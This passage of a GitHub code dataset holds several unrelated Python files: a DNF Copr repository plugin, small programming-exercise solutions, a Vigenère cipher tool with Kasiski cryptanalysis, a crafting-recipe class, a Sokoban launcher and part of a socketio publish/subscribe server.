additional parameters to '\n 'copr command are required'))\n self.cli.optparser.print_help(self)\n raise dnf.cli.CliError(\n _('exactly two additional parameters to '\n 'copr command are required'))\n try:\n chroot = self.opts.arg[1]\n except IndexError:\n chroot = self._guess_chroot(self.chroot_config)\n\n # commands without defined copr_username/copr_projectname\n if subcommand == \"search\":\n self._search(project_name)\n return\n\n project = project_name.split(\"/\")\n if len(project) not in [2, 3]:\n logger.critical(\n _('Error: ') +\n _('use format `copr_username/copr_projectname` '\n 'to reference copr project'))\n raise dnf.cli.CliError(_('bad copr project format'))\n elif len(project) == 2:\n copr_username = project[0]\n copr_projectname = project[1]\n else:\n copr_username = project[1]\n copr_projectname = project[2]\n project_name = copr_username + \"/\" + copr_projectname\n\n repo_filename = \"{0}/_copr:{1}:{2}:{3}.repo\".format(\n 
self.base.conf.get_reposdir, self.copr_hostname,\n self._sanitize_username(copr_username), copr_projectname)\n if subcommand == \"enable\":\n self._need_root()\n msg = _(\"\"\"\nYou are about to enable a Copr repository. Please note that this\nrepository is not part of the main distribution, and quality may vary.\n\nThe Fedora Project does not exercise any power over the contents of\nthis repository beyond the rules outlined in the Copr FAQ at\n,\nand packages are not held to any quality or security level.\n\nPlease do not file bug reports about these packages in Fedora\nBugzilla. In case of problems, contact the owner of this repository.\n\nDo you really want to enable {0}?\"\"\".format('/'.join([self.copr_hostname,\n copr_username, copr_projectname])))\n self._ask_user(msg)\n self._download_repo(project_name, repo_filename, chroot)\n logger.info(_(\"Repository successfully enabled.\"))\n elif subcommand == \"disable\":\n self._need_root()\n self._disable_repo(copr_username, copr_projectname)\n logger.info(_(\"Repository successfully disabled.\"))\n elif subcommand == \"remove\":\n self._need_root()\n self._remove_repo(copr_username, copr_projectname)\n logger.info(_(\"Repository successfully removed.\"))\n\n else:\n raise dnf.exceptions.Error(\n _('Unknown subcommand {}.').format(subcommand))\n\n def _list_repo_file(self, repo_id, repo, enabled_only, disabled_only):\n file_name = repo.repofile.split('/')[-1]\n\n match_new = re.match(\"_copr:\" + self.copr_hostname, file_name)\n match_old = self.copr_url == self.default_url and re.match(\"_copr_\", file_name)\n match_any = re.match(\"_copr:|^_copr_\", file_name)\n\n if self.opts.hub:\n if not match_new and not match_old:\n return\n elif not match_any:\n return\n\n enabled = repo.enabled\n if (enabled and disabled_only) or (not enabled and enabled_only):\n return\n\n old_repo = False\n # repo ID has copr::: format\n if re.match(\"copr:\", repo_id):\n copr_name = repo_id.rsplit(':', 2)\n copr_hostname = copr_name[0].split(':', 1)[1]\n msg = copr_hostname + '/' + copr_name[1] + '/' + copr_name[2]\n # repo ID has - format, try to get hub from file name\n elif re.match(\"_copr:\", file_name):\n copr_name = repo_id.split('-', 1)\n copr_hostname = file_name.rsplit(':', 2)[0].split(':', 1)[1]\n msg = copr_hostname + '/' + copr_name[0] + '/' + copr_name[1]\n # no information about hub, assume the default one\n else:\n copr_name = repo_id.split('-', 1)\n msg = self.default_hostname + '/' + copr_name[0] + '/' + copr_name[1]\n old_repo = True\n if not enabled:\n msg += \" (disabled)\"\n if old_repo:\n msg += \" *\"\n\n print(msg)\n return old_repo\n\n def _list_installed_repositories(self, directory, enabled_only, disabled_only):\n old_repo = False\n for repo_id, repo in self.base.repos.items():\n if self._list_repo_file(repo_id, repo, enabled_only, disabled_only):\n old_repo = True\n if old_repo:\n print(_(\"* These coprs have repo file with an old format that contains \"\n \"no information about Copr hub - the default one was assumed. 
\"\n \"Re-enable the project to fix this.\"))\n\n def _list_user_projects(self, user_name):\n # http://copr.fedorainfracloud.org/api/coprs/ignatenkobrain/\n api_path = \"/api/coprs/{}/\".format(user_name)\n res = self.base.urlopen(self.copr_url + api_path, mode='w+')\n try:\n json_parse = json.loads(res.read())\n except ValueError:\n raise dnf.exceptions.Error(\n _(\"Can't parse repositories for username '{}'.\")\n .format(user_name))\n self._check_json_output(json_parse)\n section_text = _(\"List of {} coprs\").format(user_name)\n self._print_match_section(section_text)\n i = 0\n while i < len(json_parse[\"repos\"]):\n msg = \"{0}/{1} : \".format(user_name,\n json_parse[\"repos\"][i][\"name\"])\n desc = json_parse[\"repos\"][i][\"description\"]\n if not desc:\n desc = _(\"No description given\")\n msg = self.base.output.fmtKeyValFill(ucd(msg), desc)\n print(msg)\n i += 1\n\n def _search(self, query):\n # http://copr.fedorainfracloud.org/api/coprs/search/tests/\n api_path = \"/api/coprs/search/{}/\".format(query)\n res = self.base.urlopen(self.copr_url + api_path, mode='w+')\n try:\n json_parse = json.loads(res.read())\n except ValueError:\n raise dnf.exceptions.Error(_(\"Can't parse search for '{}'.\"\n ).format(query))\n self._check_json_output(json_parse)\n section_text = _(\"Matched: {}\").format(query)\n self._print_match_section(section_text)\n i = 0\n while i < len(json_parse[\"repos\"]):\n msg = \"{0}/{1} : \".format(json_parse[\"repos\"][i][\"username\"],\n json_parse[\"repos\"][i][\"coprname\"])\n desc = json_parse[\"repos\"][i][\"description\"]\n if not desc:\n desc = _(\"No description given.\")\n msg = self.base.output.fmtKeyValFill(ucd(msg), desc)\n print(msg)\n i += 1\n\n def _print_match_section(self, text):\n formatted = self.base.output.fmtSection(text)\n print(formatted)\n\n def _ask_user(self, msg):\n if self.base._promptWanted():\n if self.base.conf.assumeno or not self.base.output.userconfirm(\n msg='{} [y/N]: '.format(msg), defaultyes_msg='{} [Y/n]: '.format(msg)):\n raise dnf.exceptions.Error(_('Safe and good answer. 
Exiting.'))\n\n    @classmethod\n    def _need_root(cls):\n        # FIXME this should do dnf itself (BZ#1062889)\n        if os.geteuid() != 0:\n            raise dnf.exceptions.Error(\n                _('This command has to be run under the root user.'))\n\n    @staticmethod\n    def _guess_chroot(chroot_config):\n        \"\"\" Guess which chroot is equivalent to this machine \"\"\"\n        # FIXME Copr should generate non-specific arch repo\n        dist = chroot_config\n        if dist is None or (dist[0] is False) or (dist[1] is False):\n            dist = linux_distribution()\n        if \"Fedora\" in dist:\n            # x86_64 because repo-file is same for all arch\n            # ($basearch is used)\n            if \"Rawhide\" in dist:\n                chroot = (\"fedora-rawhide-x86_64\")\n            else:\n                chroot = (\"fedora-{}-x86_64\".format(dist[1]))\n        elif \"Mageia\" in dist:\n            # Get distribution architecture (Mageia does not use $basearch)\n            distarch = rpm.expandMacro(\"%{distro_arch}\")\n            # Set the chroot\n            if \"Cauldron\" in dist:\n                chroot = (\"mageia-cauldron-{}\".format(distarch))\n            else:\n                chroot = (\"mageia-{0}-{1}\".format(dist[1], distarch))\n        elif \"openSUSE\" in dist:\n            # Get distribution architecture (openSUSE does not use $basearch)\n            distarch = rpm.expandMacro(\"%{_target_cpu}\")\n            # Set the chroot\n            if \"Tumbleweed\" in dist:\n                chroot = (\"opensuse-tumbleweed-{}\".format(distarch))\n            else:\n                chroot = (\"opensuse-leap-{0}-{1}\".format(dist[1], distarch))\n        else:\n            chroot = (\"epel-%s-x86_64\" % dist[1].split(\".\", 1)[0])\n        return chroot\n\n    def _download_repo(self, project_name, repo_filename, chroot=None):\n        if chroot is None:\n            chroot = self._guess_chroot(self.chroot_config)\n        short_chroot = '-'.join(chroot.split('-')[:2])\n        #http://copr.fedorainfracloud.org/coprs/larsks/rcm/repo/epel-7-x86_64/\n        api_path = \"/coprs/{0}/repo/{1}/\".format(project_name, short_chroot)\n\n        try:\n            f = self.base.urlopen(self.copr_url + api_path, mode='w+')\n        except IOError as e:\n            if os.path.exists(repo_filename):\n                os.remove(repo_filename)\n            if '404' in str(e):\n                if PY3:\n                    import urllib.request\n                    try:\n                        res = urllib.request.urlopen(self.copr_url + \"/coprs/\" + project_name)\n                        status_code = res.getcode()\n                    except urllib.error.HTTPError as e:\n                        status_code = e.getcode()\n                else:\n                    import urllib\n                    res = urllib.urlopen(self.copr_url + \"/coprs/\" + project_name)\n                    status_code = res.getcode()\n                if str(status_code) != '404':\n                    raise dnf.exceptions.Error(_(\"This repository does not have\"\\\n                        \" any builds yet so you cannot enable it now.\"))\n                else:\n                    raise dnf.exceptions.Error(_(\"Such repository does not exist.\"))\n            raise\n\n        for line in f:\n            if re.match(\"\\[copr:\", line):\n                repo_filename = os.path.join(self.base.conf.get_reposdir,\n                                             \"_\" + line[1:-2] + \".repo\")\n                break\n\n        # if using default hub, remove possible old repofile\n        if self.copr_url == self.default_url:\n            # copr:hub:user:project.repo => _copr_user_project.repo\n            old_repo_filename = repo_filename.replace(\"_copr:\", \"_copr\", 1)\\\n                .replace(self.copr_hostname, \"\").replace(\":\", \"_\", 1).replace(\":\", \"-\")\\\n                .replace(\"group_\", \"@\")\n            if os.path.exists(old_repo_filename):\n                os.remove(old_repo_filename)\n\n        shutil.copy2(f.name, repo_filename)\n        os.chmod(repo_filename, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)\n\n    def _get_copr_repo(self, copr_username, copr_projectname):\n        repo_id = \"copr:{0}:{1}:{2}\".format(self.copr_hostname,\n                                            self._sanitize_username(copr_username),\n                                            copr_projectname)\n        if repo_id not in self.base.repos:\n            # check if there is a repo with old ID format\n            repo_id = 
\"{0}-{1}\".format(self._sanitize_username(copr_username),\n                                            copr_projectname)\n            if repo_id in self.base.repos and \"_copr\" in self.base.repos[repo_id].repofile:\n                file_name = self.base.repos[repo_id].repofile.split('/')[-1]\n                copr_hostname = file_name.rsplit(':', 2)[0].split(':', 1)[1]\n                if copr_hostname != self.copr_hostname:\n                    return None\n            else:\n                return None\n\n        return self.base.repos[repo_id]\n\n    def _remove_repo(self, copr_username, copr_projectname):\n        # FIXME is it Copr repo ?\n        repo = self._get_copr_repo(copr_username, copr_projectname)\n        if not repo:\n            raise dnf.exceptions.Error(\n                _(\"Failed to remove copr repo {0}/{1}/{2}\"\n                  .format(self.copr_hostname, copr_username, copr_projectname)))\n        try:\n            os.remove(repo.repofile)\n        except OSError as e:\n            raise dnf.exceptions.Error(str(e))\n\n    def _disable_repo(self, copr_username, copr_projectname):\n        repo = self._get_copr_repo(copr_username, copr_projectname)\n        if repo is None:\n            raise dnf.exceptions.Error(\n                _(\"Failed to disable copr repo {}/{}\"\n                  .format(copr_username, copr_projectname)))\n\n        self.base.conf.write_raw_configfile(repo.repofile, repo.id,\n                                            self.base.conf.substitutions, {\"enabled\": 0})\n\n    @classmethod\n    def _get_data(cls, f):\n        \"\"\" Wrapper around response from server\n\n        check data and raise a readable error in case of a problem,\n        otherwise return the json object.\n        \"\"\"\n        try:\n            output = json.loads(f.read())\n        except ValueError:\n            raise dnf.cli.CliError(_(\"Unknown response from server.\"))\n        return output\n\n    @classmethod\n    def _check_json_output(cls, json_obj):\n        if json_obj[\"output\"] != \"ok\":\n            raise dnf.exceptions.Error(\"{}\".format(json_obj[\"error\"]))\n\n    @classmethod\n    def _sanitize_username(cls, copr_username):\n        if copr_username[0] == \"@\":\n            return \"group_{}\".format(copr_username[1:])\n        else:\n            return copr_username\n\n\n@dnf.plugin.register_command\nclass PlaygroundCommand(CoprCommand):\n    \"\"\" Playground plugin for DNF \"\"\"\n\n    aliases = (\"playground\",)\n    summary = _(\"Interact with Playground repository.\")\n    usage = \" [enable|disable|upgrade]\"\n\n    def _cmd_enable(self, chroot):\n        self._need_root()\n        msg = _(\"\"\"\nYou are about to enable a Playground repository.\n\nDo you want to continue?\"\"\")\n        self._ask_user(msg)\n        api_url = \"{0}/api/playground/list/\".format(\n            self.copr_url)\n        f = self.base.urlopen(api_url, mode=\"w+\")\n        output = self._get_data(f)\n        f.close()\n        if output[\"output\"] != \"ok\":\n            raise dnf.cli.CliError(_(\"Unknown response from server.\"))\n        for repo in output[\"repos\"]:\n            project_name = \"{0}/{1}\".format(repo[\"username\"],\n                                            repo[\"coprname\"])\n            repo_filename = \"{}/_playground_{}.repo\".format(self.base.conf.get_reposdir, project_name.replace(\"/\", \"-\"))\n            try:\n                if chroot not in repo[\"chroots\"]:\n                    continue\n                api_url = \"{0}/api/coprs/{1}/detail/{2}/\".format(\n                    self.copr_url, project_name, chroot)\n                f = self.base.urlopen(api_url, mode='w+')\n                output2 = self._get_data(f)\n                f.close()\n                if (output2 and (\"output\" in output2)\n                        and (output2[\"output\"] == \"ok\")):\n                    self._download_repo(project_name, repo_filename, chroot)\n            except dnf.exceptions.Error:\n                # likely 404 and that repo does not exist\n                pass\n\n    def _cmd_disable(self):\n        self._need_root()\n        for repo_filename in glob.glob(\"{}/_playground_*.repo\".format(self.base.conf.get_reposdir)):\n            os.remove(repo_filename)\n\n    @staticmethod\n    def set_argparser(parser):\n        parser.add_argument('subcommand', nargs=1,\n                            choices=['enable', 'disable', 'upgrade'])\n\n    def run(self):\n        
subcommand = self.opts.subcommand[0]\n        chroot = self._guess_chroot(self.chroot_config)\n        if subcommand == \"enable\":\n            self._cmd_enable(chroot)\n            logger.info(_(\"Playground repositories successfully enabled.\"))\n        elif subcommand == \"disable\":\n            self._cmd_disable()\n            logger.info(_(\"Playground repositories successfully disabled.\"))\n        elif subcommand == \"upgrade\":\n            self._cmd_disable()\n            self._cmd_enable(chroot)\n            logger.info(_(\"Playground repositories successfully updated.\"))\n        else:\n            raise dnf.exceptions.Error(\n                _('Unknown subcommand {}.').format(subcommand))\n","repo_name":"praiskup/dnf-plugins-core","sub_path":"plugins/copr.py","file_name":"copr.py","file_ext":"py","file_size_in_byte":23950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"74007944746","text":"\"\"\"\nauthor: buppter\ndatetime: 2019/8/16 12:48\n\n\nProblem description\nConvert a string to an integer (i.e. implement the functionality of Integer.valueOf(string), but return 0 when the string does not meet the requirements of a number).\nLibrary functions that convert strings to integers must not be used. Return 0 if the value is 0 or the string is not a valid number.\n\"\"\"\n\n\nclass Solution:\n    def StrToInt(self, s: str) -> int:\n        if not s:\n            return 0\n        flag = 1\n\n        dic = {\"0\": 0, \"1\": 1, \"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5, \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9}\n        if s[0] == \"-\":\n            flag = -1\n            s = s[1:]\n        elif s[0] == \"+\":\n            s = s[1:]\n        res = 0\n        count = 0\n\n        for i in s[::-1]:\n            if i in dic:\n                res += dic[i] * pow(10, count)\n                count += 1\n            else:\n                return 0\n\n        return res * flag\n","repo_name":"buppter/algorithms","sub_path":"TargetOffer/把字符串转换成整数.py","file_name":"把字符串转换成整数.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
{"seq_id":"36676125244","text":"def main():\n\n\twhile True:\n\t\tx = int(input())\n\t\tif x == 0:\n\t\t\tbreak\n\t\tpares = []\n\n\t\t\n\t\tfor i in range(x,x+5):\n\t\t\tif x % 2 != 0:\n\t\t\t\tx = x+1\n\t\t\tif x % 2 == 0:\n\t\t\t\tpares.append(x)\n\t\t\t\tx += 2\n\n\t\tsoma = sum(pares)\n\t\tprint(soma)\n\t\tpares = []\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"vikvik98/Algoritmos_2017.1","sub_path":"Questões do URI/questao 1159.py","file_name":"questao 1159.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"42723974303","text":"import itertools\nimport os\nimport re\nimport sys\nimport time\n\nfrom CiperOperations import frequentAnalysis, check_ifenglish\n\nLETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nNUM_MOST_FREQ_LETTERS = 4\nMAX_KEY_LENGTH = 16\nNONLETTERS_PATTERN = re.compile('[^A-Z]')\n\n\ndef findRepeatSequencesSpacings(message):\n    message = NONLETTERS_PATTERN.sub('', message.upper())\n    seqSpacings = {}\n    for seqLen in range(3, 6):\n        for seqStart in range(len(message) - seqLen):\n            seq = message[seqStart:seqStart + seqLen]\n            for i in range(seqStart + seqLen, len(message) - seqLen):\n                if message[i:i + seqLen] == seq:\n                    if seq not in seqSpacings:\n                        seqSpacings[seq] = []\n                    seqSpacings[seq].append(i - seqStart)\n    return seqSpacings\n\n\ndef getUsefulFactors(num):\n    if num < 2:\n        return []\n    factors = []\n    for i in range(2, MAX_KEY_LENGTH + 1):\n        if num % i == 0:\n            factors.append(i)\n            otherFactor = int(num / i)\n            if otherFactor < MAX_KEY_LENGTH + 1 and otherFactor != 1:\n                factors.append(otherFactor)\n    return list(set(factors))\n\n\ndef getItemAtIndexOne(items):\n    return items[1]\n\n\ndef getMostCommonFactors(seqFactors):\n    factorCounts = {}\n    for seq in seqFactors:\n        factorList = seqFactors[seq]\n        for factor in factorList:\n            
if factor not in factorCounts:\n                factorCounts[factor] = 0\n            factorCounts[factor] += 1\n    factorsByCount = []\n    for factor in factorCounts:\n        if factor <= MAX_KEY_LENGTH:\n            factorsByCount.append((factor, factorCounts[factor]))\n    factorsByCount.sort(key=getItemAtIndexOne, reverse=True)\n    return factorsByCount\n\n\ndef kasiskiExamination(ciphertext):\n    repeatedSeqSpacings = findRepeatSequencesSpacings(ciphertext)\n    seqFactors = {}\n    for seq in repeatedSeqSpacings:\n        seqFactors[seq] = []\n        for spacing in repeatedSeqSpacings[seq]:\n            seqFactors[seq].extend(getUsefulFactors(spacing))\n    factorsByCount = getMostCommonFactors(seqFactors)\n    allLikelyKeyLengths = []\n    for twoIntTuple in factorsByCount:\n        allLikelyKeyLengths.append(twoIntTuple[0])\n    return allLikelyKeyLengths\n\n\ndef getNthSubkeysLetters(nth, keyLength, message):\n    message = NONLETTERS_PATTERN.sub('', message)\n    i = nth - 1\n    letters = []\n    while i < len(message):\n        letters.append(message[i])\n        i += keyLength\n    return ''.join(letters)\n\n\ndef attemptHackWithKeyLength(ciphertext, mostLikelyKeyLength):\n    ciphertextUp = ciphertext.upper()\n    allFreqScores = []\n    for nth in range(1, mostLikelyKeyLength + 1):\n        nthLetters = getNthSubkeysLetters(nth, mostLikelyKeyLength, ciphertextUp)\n        freqScores = []\n        for possibleKey in LETTERS:\n            decryptedText, length = string_process('D', nthLetters, possibleKey)\n            keyAndFreqMatchTuple = (possibleKey, frequentAnalysis.englishFreqMatchScore(decryptedText))\n            freqScores.append(keyAndFreqMatchTuple)\n        freqScores.sort(key=getItemAtIndexOne, reverse=True)\n        allFreqScores.append(freqScores[:NUM_MOST_FREQ_LETTERS])\n    for indexes in itertools.product(range(NUM_MOST_FREQ_LETTERS), repeat=mostLikelyKeyLength):\n        possibleKey = ''\n        for i in range(mostLikelyKeyLength):\n            possibleKey += allFreqScores[i][indexes[i]][0]\n        decryptedText, length = string_process('D', ciphertextUp, possibleKey)\n        if check_ifenglish.check_ifenglish(decryptedText):\n            origCase = []\n            for i in range(len(ciphertext)):\n                if ciphertext[i].isupper():\n                    origCase.append(decryptedText[i].upper())\n                else:\n                    origCase.append(decryptedText[i].lower())\n            decryptedText = ''.join(origCase)\n\n            print('Possible encryption hack with key %s:' % (possibleKey))\n            print(decryptedText[:200])\n            print('Enter D if done, anything else to continue hacking:')\n            response = input('> ')\n            if response.strip().upper().startswith('D'):\n                return decryptedText\n    return None\n\n\ndef hackVigenere(ciphertext):\n    allLikelyKeyLengths = kasiskiExamination(ciphertext)\n    hackedMessage = None\n    for keyLength in allLikelyKeyLengths:\n        hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)\n        if hackedMessage is not None:\n            break\n    if hackedMessage is None:\n        for keyLength in range(1, MAX_KEY_LENGTH + 1):\n            if keyLength not in allLikelyKeyLengths:\n                hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)\n                if hackedMessage is not None:\n                    break\n    return hackedMessage\n\n\ndef hacker(message):\n    hackedMessage = hackVigenere(message)\n    if hackedMessage is not None:\n        return hackedMessage, len(hackedMessage)\n    else:\n        print('Failed to hack encryption.')\n\n\ndef string_process(processType, message, key):\n    if processType.upper().startswith('E') or processType.upper().startswith('D'):\n        translated = []\n        keyIndex = 0\n        key = key.upper()\n        for symbol in message:\n            num = LETTERS.find(symbol.upper())\n            if num != -1:\n                if processType.upper().startswith('E'):\n                    num += LETTERS.find(key[keyIndex])\n                elif processType.upper().startswith('D'):\n                    num -= LETTERS.find(key[keyIndex])\n                num 
%= len(LETTERS)\n if symbol.isupper():\n translated.append(LETTERS[num])\n elif symbol.islower():\n translated.append(LETTERS[num].lower())\n keyIndex += 1\n if keyIndex == len(key):\n keyIndex = 0\n else:\n translated.append(symbol)\n return ''.join(translated), len(''.join(translated))\n elif processType.upper().startswith('H'):\n return hacker(message)\n\n\ndef file_process(processType, inputFile, outputFile, key):\n if not os.path.exists(inputFile):\n print('Input File not exists')\n sys.exit()\n if os.path.exists(outputFile):\n choice = input('Output File exists, Overwrite it?(Y/N)')\n if not choice.lower().startswith('y'):\n sys.exit()\n fileObj = open(inputFile)\n content = fileObj.read()\n fileObj.close()\n starttime = time.time()\n text, text_length = string_process(processType, content, key)\n totaltime = round(time.time() - starttime, 3)\n fileObj2 = open(outputFile, 'w')\n fileObj2.write(text)\n fileObj2.close()\n return totaltime\n\n\ndef vigenereCipher(objType, processType, **kwargs):\n \"\"\"\n :param objType: String/File\n :param processType: Encrypt/Decrypt/Hacker\n :param kwargs: message/key\n :return: text,length\n \"\"\"\n\n # Default values\n message, inputFile, outputFile, key = '', '', '', ''\n\n if kwargs:\n message = kwargs.get('message')\n key = kwargs.get('key')\n else:\n if objType.upper().startswith('S'):\n message = input('Enter Message:')\n if objType.upper().startswith('F'):\n inputFile = input('Enter InputFile:')\n outputFile = input('Enter OutputFile:')\n # encrypt & decrypt\n if not processType.upper().startswith('H'):\n key = input('Enter key (words):')\n\n # String\n if objType.upper().startswith('S'):\n return string_process(processType, message, key)\n\n # File\n elif objType.upper().startswith('F'):\n if processType.upper().startswith('E'):\n return 'Encrypt Succeed', file_process('E', inputFile, outputFile, key)\n elif processType.upper().startswith('D'):\n return 'Decrypt Succeed', file_process('D', inputFile, outputFile, key)\n elif processType.upper().startswith('H'):\n return 'Hacker Succeed', file_process('H', inputFile, outputFile, key)\n else:\n sys.exit('Enter Encrypt / Decrypt / Hacker')\n else:\n sys.exit('Enter String / File')\n","repo_name":"YizheZhang-Ervin/Knowledge_Cryptography","sub_path":"CipherAlgorithms/VigenereCipher.py","file_name":"VigenereCipher.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2974344741","text":"class craftItem:\n def __init__(self, name, variantBool = False, variant=[], origin=True):\n self.name = name\n self.variantBool = variantBool\n self.variant = variant\n self.origin = origin\n \n def __str__(self) -> str:\n return self.name\n\n def __repr__(self) -> str:\n return self.name\n\nclass craftStructure:\n def __init__(self):\n self.recipeDictionary = {}\n\n def addRecipe(self, target, materials):\n self.recipeDictionary[target] = materials\n\n def getRecipe(self, target):\n return self.recipeDictionary[target]\n\n def getOriginalRecipe(self, target, amount):\n originalRecipe = {}\n for item in self.recipeDictionary[target].keys():\n if item.origin:\n if item in originalRecipe:\n originalRecipe[item] = originalRecipe[item] + self.recipeDictionary[target][item]\n else:\n originalRecipe[item] = self.recipeDictionary[target][item]\n else:\n subRecipe = self.getOriginalRecipe(item, self.recipeDictionary[target][item])\n for subitem in subRecipe.keys():\n if subitem in originalRecipe:\n 
originalRecipe[subitem] = originalRecipe[subitem] + subRecipe[subitem]\n else:\n originalRecipe[subitem] = subRecipe[subitem]\n \n updateOriginalRecipe = {}\n for item in originalRecipe.keys():\n updateOriginalRecipe[item] = originalRecipe[item] * amount\n \n return updateOriginalRecipe","repo_name":"greablezzq/CRL_Environment","sub_path":"ClassCraftStructure.py","file_name":"ClassCraftStructure.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24422796026","text":"from PyQt5.QtWidgets import (QWidget, QGridLayout,QPushButton, QApplication, QLabel, QMenuBar,QMessageBox)\nfrom PyQt5 import QtGui\nfrom sokobanModel import SokobanModel\nfrom sokobanView import sokobanView\nfrom sokobanController import sokobanController\nimport sys,os\niconroot = os.path.dirname(__file__)\n\n\napp = QApplication(sys.argv)\n\nmodel = SokobanModel()\ncontroller = sokobanController()\nview = sokobanView()\n\nmodel.addView(view)\nview.setModel(model)\nview.setController(controller)\n\ncontroller.setModel(model)\ncontroller.setView(view)\ncontroller.setLevel(1)\nmodel.getMainCharacter()\nmodel.setPiece()\n\nview.show()\n\nsys.exit(app.exec_())","repo_name":"Samuel-Ternisien/Sokoban","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40521579774","text":"\"\"\"Server for publisher subscriber system. For more information, please run `python server.py --help`\"\"\"\n\nimport asyncio\nimport logging\nimport time\nimport functools\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nfrom threading import Lock, Thread\nfrom typing import List, Optional, Union, Dict\n\nimport socketio\nfrom aiohttp import web\n\nfrom transport_message import TransportMessage\n\n\n## Setup logging ##\n# Set all loggers to ERROR level\nloggers = [logging.getLogger(name) for name in logging.root.manager.loggerDict]\nfor logger in loggers:\n logger.setLevel(logging.ERROR)\n\n# Set server logger to INFO level\n# Create file handler which logs even debug messages\nfile_handler = logging.FileHandler(\"server.log\")\nfile_handler.setLevel(logging.DEBUG)\n\n# Create console handler\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.DEBUG)\n\n# Create formatter and add it to the handlers\nformatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\nfile_handler.setFormatter(formatter)\nconsole_handler.setFormatter(formatter)\n\n# Add the handlers to the logger\nlogging.getLogger().addHandler(file_handler)\nlogging.getLogger().addHandler(console_handler)\nlogging.getLogger().setLevel(logging.DEBUG)\n\n# logging.basicConfig(level=logging.INFO, format=\"%(asctime)s - %(levelname)s - %(message)s\")\n\n\nclass ParallelTimer(Thread):\n \"\"\"Class to manage a parallel timer in different thread on the server triggering a heart beat algorithm every 20 seconds.\"\"\"\n\n def __init__(self, server) -> None:\n \"\"\"Constructor of ParallelTimer class.\n\n :param server: server object\n \"\"\"\n super().__init__()\n self.server = server\n\n def run(self):\n \"\"\"\n Starting parallel timer in loop.\n \"\"\"\n while 1:\n heartbeat = self.server.heart_beat(20)\n asyncio.run(heartbeat)\n\n\nclass Topic:\n \"\"\"Class to manage the Topics with needed data.\"\"\"\n\n name: Union[None, str] = None\n \"\"\"name of the topic\"\"\"\n content: Union[None, str] = 
None\n \"\"\"content of the topic\"\"\"\n subscribers: List[str] = []\n \"\"\"list of subscribers\"\"\"\n timestamp: Union[None, int] = None\n \"\"\"timestamp\"\"\"\n last_update: Union[None, int] = None\n \"\"\"last update of topic\"\"\"\n\n\nclass Server:\n def __init__(self) -> None:\n self._list_of_topics: List[Topic] = []\n self._sid_ip_mapping: Dict[str, str] = {}\n self._lock = Lock()\n\n self.sio = socketio.AsyncServer(\n async_mode=\"aiohttp\", cors_allowed_origins=\"*\", logger=False, engineio_logger=False\n )\n self.sio.event(self.connect)\n self.sio.on(\"SUBSCRIBE_TOPIC\", self.handle_subscribe)\n self.sio.on(\"UNSUBSCRIBE_TOPIC\", self.handle_unsubscribe)\n self.sio.on(\"PUBLISH_TOPIC\", self.handle_publish)\n self.sio.on(\"LIST_TOPICS\", self.handle_list_topics)\n self.sio.on(\"GET_TOPIC_STATUS\", self.handle_topic_status)\n\n def _check_data_none_decorator(func):\n \"\"\"Decorator for checking if data is None.\n If data is None, the client will receive an error message.\n \"\"\"\n\n @functools.wraps(func)\n async def wrapper(self, *args, **kwargs):\n sid = args[0]\n data = args[1] if len(args) > 1 else None\n if data is None:\n response = TransportMessage(\n timestamp=int(time.time()), payload=\"Missing payload of type TransportMessage.\"\n )\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.error(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n return None\n return await func(self, *args, **kwargs)\n\n return wrapper\n\n def _check_topic_decorator(func):\n \"\"\"Decorator for checking if topic exists.\n If topic does not exist, the client will receive an error message.\n \"\"\"\n\n @functools.wraps(func)\n async def wrapper(self, *args, **kwargs):\n sid = args[0]\n data = args[1] if len(args) > 1 else None\n try:\n parsed_data = TransportMessage.parse_raw(data)\n except Exception:\n response = TransportMessage(timestamp=int(time.time()), payload=\"Invalid payload.\")\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.error(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n return None\n\n # Check if data contains topic\n if parsed_data.topic is None:\n response = TransportMessage(timestamp=int(time.time()), payload=\"Missing parameter topic.\")\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.error(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n return None\n return await func(self, *args, **kwargs)\n\n return wrapper\n\n async def connect(self, sid, environ, auth=None):\n \"\"\"Called when a client connects to the server.\n\n :param sid: Generated session id\n :param environ: Environment variables\n :param auth: Unused\n \"\"\"\n logging.info(\"%s - SID: %s connected\", environ[\"aiohttp.request\"].remote, sid)\n self._sid_ip_mapping[sid] = environ[\"aiohttp.request\"].remote\n\n @_check_data_none_decorator\n @_check_topic_decorator\n async def handle_subscribe(self, sid, data=None) -> None:\n \"\"\"Called when a client subscribes to a topic.\n If the topic does not exist, it will be created. If the client is already subscribed to the topic, nothing\n changes. 
